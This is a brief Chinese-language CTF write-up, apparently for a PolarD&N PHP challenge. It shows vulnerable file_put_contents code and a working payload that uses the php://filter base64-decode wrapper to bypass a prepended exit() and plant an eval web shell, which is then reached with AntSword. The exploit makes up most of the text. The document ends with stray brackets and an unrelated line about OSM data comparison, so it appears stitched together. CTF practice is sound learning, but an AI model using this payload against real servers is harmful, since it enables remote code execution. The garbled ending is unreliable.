一、题目
<?php
/*PolarD&N CTF*/highlight_file(__FILE__);file_put_contents($_GET['filename'],"<?php exit();".$_POST['content']);?>
二、解题
payload
?filename=php://filter/convert.base64-decode/resource=shell.php
#<?=@eval($_POST[1]);?>
content=aPD89QGV2YWwoJF9QT1NUWzFdKTs/Pg==
然后访问/shell.php发现木马被读入,用蚁剑连接
)
)
外在分析:OSM 与参考数据的比较2)
